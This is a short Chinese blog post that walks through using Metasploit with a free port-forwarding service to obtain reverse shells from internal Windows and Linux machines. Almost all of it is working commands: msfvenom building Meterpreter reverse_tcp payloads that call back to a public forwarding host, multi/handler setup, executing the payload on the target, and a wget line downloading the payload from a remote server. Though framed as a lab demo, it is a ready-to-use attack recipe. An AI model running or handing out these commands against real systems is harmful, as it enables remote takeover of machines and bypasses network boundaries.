msf-端口转发-反弹shell

这里借助的是免费的端口转发工具,来进行演示。

https://www.ngrok.cc/login.html

https://console.uulap.com/app/login/?next=/

都是有可以免费使用。

实验环境:

kali :192.168.119.138 (内网)

对内网主机win/linux,反弹shell。


这就涉及目标内网机器是否可以出网。反向连接reverse_tcp/正向连接bind_tcp

反弹window-shell

端口转发

tcp协议

1

1.1

kali-msf

1
2
3
4
5
6
7
8
9
10
11
12
13
msfconsole

msfvenom -p windows/meterpreter/reverse_tcp LHOST=s0.z100.vip LPORT=38579 -f exe > zzz.exe 注意这里是公网ip/端口

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1 这里一定要是127.0.0.1,192那个不行,可能是端口转发的原因导致

set lport 8080

run

2

2.1

内网win

运行zzz.exe

反弹linux-shell

端口转发

和上面一样

kali-msf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msfconsole

show payloads 选择我们要使用的payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=s0.z100.vip LPORT=38579 -f elf > zzz.elf 注意这里是公网ip/端口

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 127.0.0.1 这里一定要是127.0.0.1,192那个不行,可能是端口转发的原因导致

set lport 8080

run

l1

l2

内网linux

1
2
3
4
chmod +x zzz.elf   给执行权限

./zzz.elf

l3

1
2
3
实际上我们可以远程下载zzz.elf

wget http://xxx.xxx.xxx.xxx:xx/zzz.elf
  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信